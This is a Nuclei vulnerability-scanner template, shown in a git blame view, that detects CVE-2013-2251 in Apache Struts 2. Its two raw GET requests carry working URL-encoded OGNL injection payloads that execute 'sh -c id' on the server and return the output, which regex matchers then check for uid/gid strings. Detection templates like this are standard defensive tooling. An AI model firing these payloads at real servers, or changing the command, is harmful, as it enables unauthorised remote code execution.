nuclei-templates/cves/2013/CVE-2013-2251.yaml

48 lines
2.2 KiB
YAML
Raw Normal View History

2021-01-02 05:02:50 +00:00
id: CVE-2013-2251
2020-10-13 22:06:01 +00:00
info:
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
author: exploitation & @dwisiswant0
2020-10-13 22:06:01 +00:00
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
2021-02-22 07:01:32 +00:00
tags: cve,cve2013,rce,struts,apache
2020-10-13 22:06:01 +00:00
requests:
- payloads:
params:
- "redirect"
- "action"
- "redirectAction"
raw:
- |
GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
- |
GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
2020-10-13 22:06:01 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- 400
condition: or
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
2020-10-13 22:06:01 +00:00
- type: word
words:
- "There is no Action mapped for namespace"
- "The origin server did not find a current representation for the target resource"
- "Apache Tomcat"
condition: or
2020-10-13 22:06:01 +00:00
part: body